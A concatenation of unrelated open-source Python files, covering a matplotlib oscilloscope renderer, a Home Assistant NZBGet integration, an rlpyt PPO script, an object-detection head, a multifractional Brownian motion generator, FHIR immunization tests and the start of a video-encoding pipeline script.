matplotlib.rcParams, "lines.antialiased", self.cfg.antialiasing
)
self._setup_axes(self.wave_nchans)
self._artists: List["Artist"] = []
_fig: "Figure"
# _axes2d[wave][chan] = Axes
# Primary, used to draw oscilloscope lines and gridlines.
_axes2d: List[List["Axes"]] # set by set_layout()
# _axes_mono[wave] = Axes
# Secondary, used for titles and debug plots.
_axes_mono: List["Axes"]
def _setup_axes(self, wave_nchans: List[int]) -> None:
"""
Creates a flat array of Matplotlib Axes, with the new layout.
Sets up each Axes with correct region limits.
"""
self.layout = RendererLayout(self.lcfg, wave_nchans)
self.layout_mono = RendererLayout(self.lcfg, [1] * self.nplots)
if hasattr(self, "_fig"):
raise Exception("I don't currently expect to call _setup_axes() twice")
# plt.close(self.fig)
cfg = self.cfg
self._fig = Figure()
self._canvas_type(self._fig)
px_inch = PX_INCH / cfg.res_divisor
self._fig.set_dpi(px_inch)
"""
Requirements:
- px_inch /= res_divisor (to scale visual elements correctly)
- int(set_size_inches * px_inch) == self.w,h
- matplotlib uses int instead of round. Who knows why.
- round(set_size_inches * px_inch) == self.w,h
- just in case matplotlib changes its mind
Solution:
- (set_size_inches * px_inch) == self.w,h + 0.25
- set_size_inches == (self.w,h + 0.25) / px_inch
"""
offset = 0.25
self._fig.set_size_inches(
(self.w + offset) / px_inch, (self.h + offset) / px_inch
)
real_dims = self._fig.canvas.get_width_height()
assert (self.w, self.h) == real_dims, [(self.w, self.h), real_dims]
# Setup background
self._fig.set_facecolor(cfg.bg_color)
# Create Axes (using self.lcfg, wave_nchans)
# _axes2d[wave][chan] = Axes
self._axes2d = self.layout.arrange(self._axes_factory)
"""
Adding an axes using the same arguments as a previous axes
currently reuses the earlier instance.
In a future version, a new instance will always be created and returned.
Meanwhile, this warning can be suppressed, and the future behavior ensured,
by passing a unique label to each axes instance.
ax=fig.add_axes(label=) is unused, even if you call ax.legend().
"""
# _axes_mono[wave] = Axes
self._axes_mono = []
# Returns 2D list of [self.nplots][1]Axes.
axes_mono_2d = self.layout_mono.arrange(self._axes_factory, label="mono")
for axes_list in axes_mono_2d:
(axes,) = axes_list # type: Axes
# List of colors at
# https://matplotlib.org/gallery/color/colormap_reference.html
# Discussion at https://github.com/matplotlib/matplotlib/issues/10840
cmap: ListedColormap = matplotlib.cm.get_cmap("Accent")
colors = cmap.colors
axes.set_prop_cycle(color=colors)
self._axes_mono.append(axes)
# Setup axes
for idx, N in enumerate(self.wave_nsamps):
wave_axes = self._axes2d[idx]
viewport_stride = self.render_strides[idx] * cfg.viewport_width
ylim = cfg.viewport_height
def scale_axes(ax: "Axes"):
xlim = calc_limits(N, viewport_stride)
ax.set_xlim(*xlim)
ax.set_ylim(-ylim, ylim)
scale_axes(self._axes_mono[idx])
for ax in unique_by_id(wave_axes):
scale_axes(ax)
# Setup midlines (depends on max_x and wave_data)
midline_color = cfg.midline_color
midline_width = cfg.grid_line_width
# Not quite sure if midlines or gridlines draw on top
kw = dict(color=midline_color, linewidth=midline_width)
if cfg.v_midline:
ax.axvline(x=calc_center(viewport_stride), **kw)
if cfg.h_midline:
ax.axhline(y=0, **kw)
self._save_background()
transparent = "#00000000"
# satisfies RegionFactory
def _axes_factory(self, r: RegionSpec, label: str = "") -> "Axes":
cfg = self.cfg
width = 1 / r.ncol
left = r.col / r.ncol
assert 0 <= left < 1
height = 1 / r.nrow
bottom = (r.nrow - r.row - 1) / r.nrow
assert 0 <= bottom < 1
# Disabling xticks/yticks is unnecessary, since we hide Axises.
ax = self._fig.add_axes(
[left, bottom, width, height], xticks=[], yticks=[], label=label
)
grid_color = cfg.grid_color
if grid_color:
# Initialize borders
# Hide Axises
# (drawing them is very slow, and we disable ticks+labels anyway)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Background color
# ax.patch.set_fill(False) sets _fill=False,
# then calls _set_facecolor(...) "alpha = self._alpha if self._fill else 0".
# It is no faster than below.
ax.set_facecolor(self.transparent)
# Set border colors
for spine in ax.spines.values(): # type: Spine
spine.set_linewidth(cfg.grid_line_width)
spine.set_color(grid_color)
def hide(key: str):
ax.spines[key].set_visible(False)
# Hide all axes except bottom-right.
hide("top")
hide("left")
# If bottom of screen, hide bottom. If right of screen, hide right.
if r.screen_edges & Edges.Bottom:
hide("bottom")
if r.screen_edges & Edges.Right:
hide("right")
# Dim stereo gridlines
if cfg.stereo_grid_opacity > 0:
dim_color = matplotlib.colors.to_rgba_array(grid_color)[0]
dim_color[-1] = cfg.stereo_grid_opacity
def dim(key: str):
ax.spines[key].set_color(dim_color)
else:
dim = hide
# If not bottom of wave, dim bottom. If not right of wave, dim right.
if not r.wave_edges & Edges.Bottom:
dim("bottom")
if not r.wave_edges & Edges.Right:
dim("right")
else:
ax.set_axis_off()
return ax
# Public API
def add_lines_stereo(
self, dummy_datas: List[np.ndarray], strides: List[int]
) -> UpdateLines:
cfg = self.cfg
# Plot lines over background
line_width = cfg.line_width
# Foreach wave, plot dummy data.
lines2d = []
for wave_idx, wave_data in enumerate(dummy_datas):
wave_zeros = np.zeros_like(wave_data)
wave_axes = self._axes2d[wave_idx]
wave_lines = []
xs = calc_xs(len(wave_zeros), strides[wave_idx])
# Foreach chan
for chan_idx, chan_zeros in enumerate(wave_zeros.T):
ax = wave_axes[chan_idx]
line_color = self._line_params[wave_idx].color
chan_line: Line2D = ax.plot(
xs, chan_zeros, color=line_color, linewidth=line_width
)[0]
wave_lines.append(chan_line)
lines2d.append(wave_lines)
self._artists.extend(wave_lines)
return lambda datas: self._update_lines_stereo(lines2d, datas)
def _update_lines_stereo(
self, lines2d: "List[List[Line2D]]", inputs: List[RenderInput]
) -> None:
"""
Preconditions:
- lines2d[wave][chan] = Line2D
- inputs[wave] = ndarray, [samp][chan] = FLOAT
"""
nplots = len(lines2d)
ndata = len(inputs)
if nplots != ndata:
raise ValueError(
f"incorrect data to plot: {nplots} plots but {ndata} dummy_datas"
)
# Draw waveform data
# Foreach wave
for wave_idx, input in enumerate(inputs):
wave_data = input.data
freq_estimate = input.freq_estimate
wave_lines = lines2d[wave_idx]
color_by_pitch = self._line_params[wave_idx].color_by_pitch
# If we color notes by pitch, then on every frame,
# recompute the color based on current pitch.
# If no sound is detected, fall back to the default color.
# If we don't color notes by pitch,
# just keep the initial color and never overwrite it.
if color_by_pitch:
fallback_color = self._line_params[wave_idx].color
color = freq_to_color(self.pitch_cmap, freq_estimate, fallback_color)
# Foreach chan
for chan_idx, chan_data in enumerate(wave_data.T):
chan_line = wave_lines[chan_idx]
chan_line.set_ydata(chan_data)
if color_by_pitch:
chan_line.set_color(color)
def _add_xy_line_mono(
self, wave_idx: int, xs: Sequence[float], ys: Sequence[float], stride: int
) -> CustomLine:
cfg = self.cfg
# Plot lines over background
line_width = cfg.line_width
ax = self._axes_mono[wave_idx]
mono_line: Line2D = ax.plot(xs, ys, linewidth=line_width)[0]
self._artists.append(mono_line)
# noinspection PyTypeChecker
return CustomLine(stride, xs, mono_line.set_xdata, mono_line.set_ydata)
# Channel labels
def add_labels(self, labels: List[str]) -> List["Text"]:
"""
Updates background, adds text.
Do NOT call after calling self.add_lines().
"""
nlabel = len(labels)
if nlabel != self.nplots:
raise ValueError(
f"incorrect labels: {self.nplots} plots but {nlabel} labels"
)
cfg = self.cfg
color = cfg.get_label_color
size_pt = cfg.label_font.size
distance_px = cfg.label_padding_ratio * size_pt
@attr.dataclass
class AxisPosition:
pos_axes: float
offset_px: float
align: str
xpos = cfg.label_position.x.match(
left=AxisPosition(0, distance_px, "left"),
right=AxisPosition(1, -distance_px, "right"),
)
ypos = cfg.label_position.y.match(
bottom=AxisPosition(0, distance_px, "bottom"),
top=AxisPosition(1, -distance_px, "top"),
)
pos_axes = (xpos.pos_axes, ypos.pos_axes)
offset_pt = (xpos.offset_px, ypos.offset_px)
out: List["Text"] = []
for label_text, ax in zip(labels, self._axes_mono):
# https://matplotlib.org/api/_as_gen/matplotlib.axes.Axes.annotate.html
# Annotation subclasses Text.
text: "Annotation" = ax.annotate(
label_text,
# Positioning
xy=pos_axes,
xycoords="axes fraction",
xytext=offset_pt,
textcoords="offset points",
horizontalalignment=xpos.align,
verticalalignment=ypos.align,
# Cosmetics
color=color,
fontsize=px_from_points(size_pt),
fontfamily=cfg.label_font.family,
fontweight=("bold" if cfg.label_font.bold else "normal"),
fontstyle=("italic" if cfg.label_font.italic else "normal"),
)
out.append(text)
self._save_background()
return out
# Output frames
def get_frame(self) -> ByteBuffer:
"""Returns bytes with shape (h, w, self.bytes_per_pixel).
The actual return value's shape may be flat.
"""
self._redraw_over_background()
canvas = self._fig.canvas
# Agg is the default noninteractive backend except on OSX.
# https://matplotlib.org/faq/usage_faq.html
if not isinstance(canvas, self._canvas_type):
raise RuntimeError(
f"oh shit, cannot read data from {obj_name(canvas)} != {self._canvas_type.__name__}"
)
buffer_rgb = self._canvas_to_bytes(canvas)
assert len(buffer_rgb) == self.w * self.h * self.bytes_per_pixel
return buffer_rgb
# Pre-rendered background
bg_cache: Any # "matplotlib.backends._backend_agg.BufferRegion"
def _save_background(self) -> None:
"""Draw static background."""
# https://stackoverflow.com/a/8956211
# https://matplotlib.org/api/animation_api.html#funcanimation
fig = self._fig
fig.canvas.draw()
self.bg_cache = fig.canvas.copy_from_bbox(fig.bbox)
def _redraw_over_background(self) -> None:
"""Redraw animated elements of the image."""
# Both FigureCanvasAgg and FigureCanvasCairo, but not FigureCanvasBase,
# support restore_region().
canvas: FigureCanvasAgg = self._fig.canvas
canvas.restore_region(self.bg_cache)
for artist in self._artists:
artist.axes.draw_artist(artist)
# canvas.blit(self._fig.bbox) is unnecessary when drawing off-screen.
class MatplotlibAggRenderer(AbstractMatplotlibRenderer):
# implements AbstractMatplotlibRenderer
_canvas_type = FigureCanvasAgg
@staticmethod
def _canvas_to_bytes(canvas: FigureCanvasAgg) -> ByteBuffer:
# In matplotlib >= 3.1, canvas.buffer_rgba() returns a zero-copy memoryview.
# This is faster to print to screen than the previous bytes.
# Also the APIs are incompatible.
# Flatten all dimensions of the memoryview.
return canvas.buffer_rgba().cast("B")
# Implements _RendererBackend.
bytes_per_pixel = 4
ffmpeg_pixel_format = "rgb0"
@staticmethod
def color_to_bytes(c: str) -> np.ndarray:
from matplotlib.colors import to_rgba
return np.array([round(c * 255) for c in to_rgba(c)], dtype=int)
# TODO: PlotConfig
# - align: left vs mid
# - shift/offset: bool
# - invert if trigger is negative: bool
class RendererFrontend(_RendererBackend, ABC):
"""Wrapper around _RendererBackend implementations, providing a better interface."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._update_main_lines = None
self._custom_lines = {} # type: Dict[Any, CustomLine]
self._vlines = {} # type: Dict[Any, CustomLine]
self._offsetable = defaultdict(list)
# Overrides implementations of _RendererBackend.
def get_frame(self) -> ByteBuffer:
out = super().get_frame()
for line in self._custom_lines.values():
line.set_ydata(0 * line.xdata)
for line in self._vlines.values():
line.set_xdata(0 * line.xdata)
return out
# New methods.
_update_main_lines: Optional[UpdateLines]
def update_main_lines(self, inputs: List[RenderInput]) -> None:
datas = [input.data for input in inputs]
if self._update_main_lines is None:
self._update_main_lines = self.add_lines_stereo(datas, self.render_strides)
self._update_main_lines(inputs)
_offsetable: DefaultDict[int, MutableSequence[CustomLine]]
def update_custom_line(
self,
name: str,
wave_idx: int,
stride: int,
data: np.ndarray,
*,
offset: bool = True,
):
data = data.copy()
key = (name, wave_idx)
if key not in self._custom_lines:
line = self._add_line_mono(wave_idx, stride, data)
self._custom_lines[key] = line
if offset:
self._offsetable[wave_idx].append(line)
else:
line = self._custom_lines[key]
line.set_ydata(data)
def update_vline(
self, name: str, wave_idx: int, stride: int, x: int, *, offset: bool = True
):
key = (name, wave_idx)
if key not in self._vlines:
line = self._add_vline_mono(wave_idx, stride)
self._vlines[key] = line
if offset:
self._offsetable[wave_idx].append(line)
else:
line = self._vlines[key]
line.xdata = [x * stride] * 2
line.set_xdata(line.xdata)
def offset_viewport(self, wave_idx: int, viewport_offset: float):
line_offset = -viewport_offset
for line in self._offsetable[wave_idx]:
line.set_xdata(line.xdata + line_offset * line.stride)
def _add_line_mono(
self, wave_idx: int, stride: int, dummy_data: np.ndarray
) -> CustomLine:
ys = np.zeros_like(dummy_data)
xs = calc_xs(len(ys), stride)
return self._add_xy_line_mono(wave_idx, xs, ys, stride)
def _add_vline_mono(self, wave_idx: int, stride: int) -> CustomLine:
return self._add_xy_line_mono(wave_idx, [0, 0], [-1, 1], stride)
class Renderer(RendererFrontend, MatplotlibAggRenderer):
pass
|
homeassistant/components/nzbget/__init__.py
|
andersop91/core
| 22,481 |
128885
|
"""The NZBGet integration."""
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_SCAN_INTERVAL,
CONF_SSL,
CONF_USERNAME,
Platform,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import (
ATTR_SPEED,
DATA_COORDINATOR,
DATA_UNDO_UPDATE_LISTENER,
DEFAULT_NAME,
DEFAULT_PORT,
DEFAULT_SCAN_INTERVAL,
DEFAULT_SPEED_LIMIT,
DEFAULT_SSL,
DOMAIN,
SERVICE_PAUSE,
SERVICE_RESUME,
SERVICE_SET_SPEED,
)
from .coordinator import NZBGetDataUpdateCoordinator
PLATFORMS = [Platform.SENSOR, Platform.SWITCH]
CONFIG_SCHEMA = vol.Schema(
vol.All(
cv.deprecated(DOMAIN),
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL
): cv.time_period,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
}
)
},
),
extra=vol.ALLOW_EXTRA,
)
SPEED_LIMIT_SCHEMA = vol.Schema(
{vol.Optional(ATTR_SPEED, default=DEFAULT_SPEED_LIMIT): cv.positive_int}
)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the NZBGet integration."""
hass.data.setdefault(DOMAIN, {})
if hass.config_entries.async_entries(DOMAIN):
return True
if DOMAIN in config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config[DOMAIN],
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up NZBGet from a config entry."""
if not entry.options:
options = {
CONF_SCAN_INTERVAL: entry.data.get(
CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
),
}
hass.config_entries.async_update_entry(entry, options=options)
coordinator = NZBGetDataUpdateCoordinator(
hass,
config=entry.data,
options=entry.options,
)
await coordinator.async_config_entry_first_refresh()
undo_listener = entry.add_update_listener(_async_update_listener)
hass.data[DOMAIN][entry.entry_id] = {
DATA_COORDINATOR: coordinator,
DATA_UNDO_UPDATE_LISTENER: undo_listener,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
_async_register_services(hass, coordinator)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN][entry.entry_id][DATA_UNDO_UPDATE_LISTENER]()
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
def _async_register_services(
hass: HomeAssistant,
coordinator: NZBGetDataUpdateCoordinator,
) -> None:
"""Register integration-level services."""
def pause(call: ServiceCall) -> None:
"""Service call to pause downloads in NZBGet."""
coordinator.nzbget.pausedownload()
def resume(call: ServiceCall) -> None:
"""Service call to resume downloads in NZBGet."""
coordinator.nzbget.resumedownload()
def set_speed(call: ServiceCall) -> None:
"""Service call to rate limit speeds in NZBGet."""
coordinator.nzbget.rate(call.data[ATTR_SPEED])
hass.services.async_register(DOMAIN, SERVICE_PAUSE, pause, schema=vol.Schema({}))
hass.services.async_register(DOMAIN, SERVICE_RESUME, resume, schema=vol.Schema({}))
hass.services.async_register(
DOMAIN, SERVICE_SET_SPEED, set_speed, schema=SPEED_LIMIT_SCHEMA
)
async def _async_update_listener(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(entry.entry_id)
class NZBGetEntity(CoordinatorEntity):
"""Defines a base NZBGet entity."""
def __init__(
self, *, entry_id: str, name: str, coordinator: NZBGetDataUpdateCoordinator
) -> None:
"""Initialize the NZBGet entity."""
super().__init__(coordinator)
self._name = name
self._entry_id = entry_id
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
|
rlpyt/ul/experiments/rl_from_ul/scripts/atari/train/atari_ppo_from_ul_serial.py
|
wingbender/rlpyt
| 2,122 |
128899
|
import sys
import pprint
import os.path as osp
from rlpyt.utils.launching.affinity import affinity_from_code
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.samplers.parallel.cpu.collectors import CpuResetCollector
from rlpyt.envs.atari.atari_env import AtariTrajInfo
from rlpyt.ul.envs.atari import AtariEnv84
from rlpyt.algos.pg.ppo import PPO
# from rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent
# from rlpyt.ul.agents.atari_dqn_rl_from_ul_agent import AtariDqnRlFromUlAgent
from rlpyt.ul.agents.atari_pg_agent import AtariPgAgent
from rlpyt.runners.minibatch_rl import MinibatchRl
from rlpyt.utils.logging.context import logger_context
from rlpyt.utils.launching.variant import load_variant, update_config
from rlpyt.ul.experiments.rl_from_ul.configs.atari_ppo_from_ul import configs
def build_and_train(
slot_affinity_code="0slt_1gpu_1cpu",
log_dir="test",
run_ID="0",
config_key="ppo_16env",
experiment_title="exp",
):
affinity = affinity_from_code(slot_affinity_code)
config = configs[config_key]
variant = load_variant(log_dir)
config = update_config(config, variant)
# Hack that the first part of the log_dir matches the source of the model
model_base_dir = config["pretrain"]["model_dir"]
if model_base_dir is not None:
raw_log_dir = log_dir.split(experiment_title)[-1].lstrip("/") # get rid of ~/GitRepos/adam/rlpyt/data/local/<timestamp>/
model_sub_dir = raw_log_dir.split("/RlFromUl/")[0] # keep the UL part, which comes first
config["agent"]["state_dict_filename"] = osp.join(model_base_dir,
model_sub_dir, "run_0/params.pkl")
pprint.pprint(config)
sampler = SerialSampler(
EnvCls=AtariEnv84,
env_kwargs=config["env"],
CollectorCls=CpuResetCollector,
TrajInfoCls=AtariTrajInfo,
eval_env_kwargs=config["env"], # Same args!
**config["sampler"]
)
algo = PPO(optim_kwargs=config["optim"], **config["algo"])
agent = AtariPgAgent(model_kwargs=config["model"], **config["agent"])
runner = MinibatchRl(
algo=algo,
agent=agent,
sampler=sampler,
affinity=affinity,
**config["runner"]
)
name = config["env"]["game"]
with logger_context(log_dir, run_ID, name, config):
runner.train()
if __name__ == "__main__":
build_and_train(*sys.argv[1:])
|
mmdet/models/bbox_heads/DCM_bbox_head.py
|
ydiller/BalancedGroupSoftmax
| 333 |
128926
|
<reponame>ydiller/BalancedGroupSoftmax<filename>mmdet/models/bbox_heads/DCM_bbox_head.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import pickle
from mmdet.core import (delta2bbox, force_fp32,
multiclass_nms)
from .convfc_bbox_head import SharedFCBBoxHead
from ..builder import build_loss
from ..registry import HEADS
from ..losses import accuracy
@HEADS.register_module
class DCMBBoxHead(SharedFCBBoxHead):
def __init__(self,
num_fcs=2,
fc_out_channels=1024,
*args,
**kwargs):
super(DCMBBoxHead, self).__init__(num_fcs=num_fcs,
fc_out_channels=fc_out_channels,
*args, **kwargs)
def forward(self, x):
# shared part
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
for fc in self.shared_fcs:
before_relu = fc(x)
x = self.relu(before_relu)
# separate branches
x_cls = x
x_reg = x
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
return cls_score, bbox_pred, before_relu
@force_fp32(apply_to=('cls_score', 'bbox_pred'))
def get_det_bboxes(self,
rois,
cls_score,
bbox_pred,
img_shape,
scale_factor,
rescale=False,
cfg=None):
# if isinstance(cls_score, list):
# cls_score = sum(cls_score) / float(len(cls_score))
# scores = F.softmax(cls_score, dim=1) if cls_score is not None else None
scores = cls_score
if bbox_pred is not None:
bboxes = delta2bbox(rois[:, 1:], bbox_pred, self.target_means,
self.target_stds, img_shape)
else:
bboxes = rois[:, 1:].clone()
if img_shape is not None:
bboxes[:, [0, 2]].clamp_(min=0, max=img_shape[1] - 1)
bboxes[:, [1, 3]].clamp_(min=0, max=img_shape[0] - 1)
if rescale:
if isinstance(scale_factor, float):
bboxes /= scale_factor
else:
bboxes /= torch.from_numpy(scale_factor).to(bboxes.device)
if cfg is None:
return bboxes, scores
else:
det_bboxes, det_labels = multiclass_nms(bboxes, scores,
cfg.score_thr, cfg.nms,
cfg.max_per_img)
return det_bboxes, det_labels
|
stochastic/processes/continuous/multifractional_brownian_motion.py
|
zaczw/stochastic
| 268 |
128939
|
<reponame>zaczw/stochastic
"""Multifractional Brownian motion."""
import inspect
import numpy as np
from scipy.special import gamma
from stochastic.processes.base import BaseTimeProcess
class MultifractionalBrownianMotion(BaseTimeProcess):
r"""Multifractional Brownian motion process.
.. image:: _static/multifractional_brownian_motion.png
:scale: 50%
A multifractional Brownian motion generalizes a fractional Brownian
motion with a Hurst parameter which is a function of time,
:math:`h(t)`. If the Hurst is constant, the process is a fractional
Brownian motion. If Hurst is constant equal to 0.5, the process is a
Brownian motion.
Approximate method originally proposed for fBm in
* <NAME>, and <NAME>. "An accurate fractional Brownian
motion generator." Physica A: Statistical Mechanics and its Applications
208, no. 1 (1994): 21-30.
Adapted to approximate mBm in
* <NAME>., and <NAME>. "Modeling of locally self-similar
processes using multifractional Brownian motion of Riemann-Liouville
type." Physical Review E 63, no. 4 (2001): 046104.
:param float hurst: a callable with one argument :math:`h(t)` such that
:math:`h(t') \in (0, 1) \forall t' \in [0, t]`. Default is
:math:`h(t) = 0.5`.
:param float t: the right hand endpoint of the time interval :math:`[0,t]`
for the process
:param numpy.random.Generator rng: a custom random number generator
"""
def __init__(self, hurst=None, t=1, rng=None):
super().__init__(t=t, rng=rng)
self.hurst = hurst if hurst is not None else lambda x: 0.5
self._n = None
def __str__(self):
return "Multifractional Brownian motion with Hurst function " + "{h} on [0, {t}].".format(
t=str(self.t), h=self.hurst.__name__
)
def __repr__(self):
return "FractionalBrownianMotion(hurst={h}, t={t})".format(t=str(self.t), h=self.hurst.__name__)
@property
def hurst(self):
"""Hurst function."""
return self._hurst
@hurst.setter
def hurst(self, value):
try:
num_args = len(inspect.signature(value).parameters)
except Exception:
raise ValueError("Hurst parameter must be a function of one argument.")
if not callable(value) or num_args != 1:
raise ValueError("Hurst parameter must be a function of one argument.")
self._hurst = value
self._changed = True
def _check_hurst(self, value):
self._hs = [value(t) for t in self.times(self._n)]
for h in self._hs:
if h <= 0 or h >= 1:
raise ValueError("Hurst range must be on interval (0, 1).")
def _sample_multifractional_brownian_motion(self, n):
"""Generate Riemann-Liouville mBm."""
gn = self.rng.normal(0.0, 1.0, n)
self._set_times(n)
self._dt = 1.0 * self.t / self._n
self._check_hurst(self.hurst)
mbm = [0]
coefs = [(g / np.sqrt(self._dt)) * self._dt for g in gn]
for k in range(1, self._n + 1):
weights = [self._w(t, self._hs[k]) for t in self._times[1 : k + 1]]
seq = [coefs[i - 1] * weights[k - i] for i in range(1, k + 1)]
mbm.append(sum(seq))
return np.array(mbm)
def sample(self, n):
"""Generate a realization.
:param int n: the number of increments to generate
"""
return self._sample_multifractional_brownian_motion(n)
def _w(self, t, hurst):
"""Get the Riemann-Liouville method weight for time t."""
w = (
1.0
/ gamma(hurst + 0.5)
* np.sqrt((t ** (2 * hurst) - (t - self._dt) ** (2 * hurst)) / (2 * hurst * self._dt))
)
return w
|
fhir/resources/DSTU2/tests/test_immunization.py
|
cstoltze/fhir.resources
| 144 |
128964
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: DSTU2
Version: 1.0.2
Revision: 7202
"""
from .. import fhirtypes # noqa: F401
from .. import immunization
def testImmunization1(base_settings):
filename = base_settings["unittest_data_dir"] / "immunization-example-refused.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_Immunization_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_Immunization_1(inst2)
def impl_Immunization_1(inst):
assert inst.date == fhirtypes.Date.validate("2013-01-10")
assert inst.explanation.reasonNotGiven[0].coding[0].code == "MEDPREC"
assert inst.explanation.reasonNotGiven[0].coding[0].display == (
"medical precaution"
)
assert inst.explanation.reasonNotGiven[0].coding[0].system == (
"http://hl7.org/fhir/v3/ActReason"
)
assert inst.id == "notGiven"
assert inst.reported is False
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "01"
assert inst.vaccineCode.coding[0].display == "DTP"
assert inst.vaccineCode.coding[0].system == "http://hl7.org/fhir/sid/cvx"
assert inst.wasNotGiven is True
def test_Immunization_2(base_settings):
filename = base_settings["unittest_data_dir"] / "immunization-example.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_Immunization_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_Immunization_2(inst2)
def impl_Immunization_2(inst):
assert inst.date == fhirtypes.Date.validate("2013-01-10")
assert inst.doseQuantity.code == "mg"
assert inst.doseQuantity.system == "http://unitsofmeasure.org"
assert inst.doseQuantity.value == 5
assert inst.expirationDate == fhirtypes.Date.validate("2015-02-15")
assert inst.explanation.reason[0].coding[0].code == "429060002"
assert inst.explanation.reason[0].coding[0].system == "http://snomed.info/sct"
assert inst.id == "example"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.lotNumber == "AAJN11K"
assert inst.note[0].text == "Notes on adminstration of vaccine"
assert inst.reaction[0].date == fhirtypes.Date.validate("2013-01-10")
assert inst.reaction[0].reported is True
assert inst.reported is False
assert inst.route.coding[0].code == "IM"
assert inst.route.coding[0].display == "Injection, intramuscular"
assert inst.route.coding[0].system == (
"http://hl7.org/fhir/v3/RouteOfAdministration"
)
assert inst.site.coding[0].code == "LA"
assert inst.site.coding[0].display == "left arm"
assert inst.site.coding[0].system == "http://hl7.org/fhir/v3/ActSite"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccinationProtocol[0].description == (
"Vaccination Protocol Sequence 1"
)
assert inst.vaccinationProtocol[0].doseSequence == 1
assert inst.vaccinationProtocol[0].doseStatus.coding[0].code == "count"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].display == "Counts"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].system == (
"http://hl7.org/fhir/vaccination-protocol-dose-status"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].code == "coldchbrk"
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].display == (
"Cold chain break"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].system == (
"http://hl7.org/fhir/vaccination-protocol-dose-status-reason"
)
assert inst.vaccinationProtocol[0].series == "Vaccination Series 1"
assert inst.vaccinationProtocol[0].seriesDoses == 2
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].code == ("1857005")
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].system == (
"http://snomed.info/sct"
)
assert inst.vaccineCode.coding[0].code == "FLUVAX"
assert inst.vaccineCode.coding[0].system == "urn:oid:172.16.31.10.2001.1005.17"
assert inst.vaccineCode.text == "Fluvax (Influenza)"
assert inst.wasNotGiven is False
|
Testcase4-Application-breakdown/online-compiling/tools/python_sdk/examples/excamera-example/excam_ex.py
|
hunhoffe/ServerlessBench
| 129 |
128983
|
#! /usr/bin/python3
from gg_sdk import GG, GGThunk
import sys
import math
VPXENC = 'vpxenc --ivf --codec=vp8 --good --cpu-used=0 --end-usage=cq --min-q=0 --max-q=63 --cq-level={quality} --buf-initial-sz=10000 --buf-optimal-sz=20000 --buf-sz=40000 --undershoot-pct=100 --passes=2 --auto-alt-ref=1 --threads=1 --token-parts=0 --tune=ssim --target-bitrate=4294967295 -o {output}.ivf {input}.y4m'
TERMINATE_CHUNK = "xc-terminate-chunk {input}.ivf {output}.ivf"
XC_DUMP_0 = 'xc-dump {input}.ivf {output}.state'
XC_DUMP_1 = 'xc-dump -S {input_state}.state {input}.ivf {output}.state'
XC_ENC_FIRST_FRAME = 'xc-enc -W -w 0.75 -i y4m -o {output}.ivf -r -I {source_state}.state -p {input_pred}.ivf {input}.y4m'
XC_ENC_REBASE = 'xc-enc -W -w 0.75 -i y4m -o {output}.ivf -r -I {source_state}.state -p {input_pred}.ivf -S {pred_state}.state {input}.y4m'
def bname(i):
return "{:08d}".format(i)
def make_command(cmd):
return "\t{}".format(cmd)
"""
For this pipeline, we must keep track of state. Therefore, as we create
